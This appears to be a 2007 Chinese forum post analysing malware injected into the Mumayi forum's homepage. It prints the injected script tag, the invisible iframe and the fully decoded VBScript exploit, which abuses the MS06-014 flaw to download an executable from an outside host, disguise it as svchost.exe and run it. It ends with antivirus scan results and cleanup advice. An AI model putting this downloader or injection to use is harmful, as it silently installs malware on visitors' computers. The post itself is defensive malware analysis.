- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 性别
- 男
- 来自
- 海之城 Amoy 厦门
- 注册时间
- 2007-4-13
- 最后登录
- 2008-2-15
    
|
木蚂蚁论坛被挂马,NOD32用户安然无虞!
木蚂蚁论坛被挂马,NOD32用户安然无虞!
这次的马在主页(bbs.mumayi.net)上面,源代码被加上了这样一句
<script id="advjs" src="http://web.77276.com/adv.js?showmatrix_num=056"></script>
根据上面链接的showmatrix_num=056和adv.js中的内容:
document.write("<iframe src=\"http://web.77276.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
可以知道这个会调用http://web.77276.com/1/056.htm这个网页
而这个056.htm有在跳转多一次,跳转到了http://web.77276.com/0.htm,打开源文件一看,N多三位数字,明显就是ASCII码了,转换他们后狐狸终于露出尾巴了,看看它吧:
on error resume next
tc = "http://do.77276.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"BD96C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
Set x = df.CreateObject(str,"")
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, tc, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
set Q = df.createobject("She"&"ll."&"App"&"li"&"ca"&"tion","")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
下载http://do.77276.com/0.exe到临时文件夹下面,名字为svchost.exe,并创建svchost.vbs来调用svchost.exe
下面是多引擎扫描对0.exe的扫描结果,可以看出结果不太一致,而且在虚拟机中运行是出错,故暂时无法说清楚是哪个病毒,但扫描结果倾向于viking的较多,估计为viking
AhnLab-V3 2007.3.24.1 03.24.2007 Win32/Viking.suspicious
AntiVir 7.3.1.44 03.23.2007 TR/Crypt.NSPM.Gen
Authentium 4.93.8 03.24.2007 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 03.23.2007 Win32:Tibs-ADO
AVG 7.5.0.447 03.24.2007 no virus found
BitDefender 7.2 03.25.2007 GenPack:Win32.Worm.Viking.IZ
CAT-QuickHeal 9.00 03.23.2007 (Suspicious) - DNAScan
ClamAV devel-20070312 03.25.2007 no virus found
DrWeb 4.33 03.25.2007 Win32.HLLW.Gavir.54
eSafe 7.0.14.0 03.22.2007 suspicious Trojan/Worm
eTrust-Vet 30.6.3506 03.23.2007 Win32/Looked.HN
Ewido 4.0 03.24.2007 no virus found
FileAdvisor 1 03.25.2007 no virus found
Fortinet 2.85.0.0 03.25.2007 suspicious
F-Prot 4.3.1.45 03.23.2007 W32/PWStealer.gen1
F-Secure 6.70.13030.0 03.24.2007 Viking.gen
Ikarus T3.1.1.3 03.25.2007 Trojan-PWS.Win32.OnLineGames.id
Kaspersky 4.0.2.24 03.25.2007 no virus found
McAfee 4991 03.23.2007 no virus found
Microsoft 1.2306 03.25.2007 no virus found
NOD32v2 2143 03.25.2007 Win32/Pacex.Gen
Norman 5.80.02 03.23.2007 Viking.gen
Panda 9.0.0.4 03.24.2007 Suspicious file
Prevx1 V2 03.25.2007 Trojan.SystemPoser
Sophos 4.15.0 03.23.2007 no virus found
Sunbelt 2.2.907.0 03.24.2007 no virus found
Symantec 10 03.25.2007 W32.Lo
|
如果在临时文件夹下面发现了svchost.vbs和svchost.exe这两个文件,建议立刻进行查杀,并打上MS06-014漏洞补丁,http://www.microsoft.com/china/t ... letin/ms06-014.mspx |
|
|
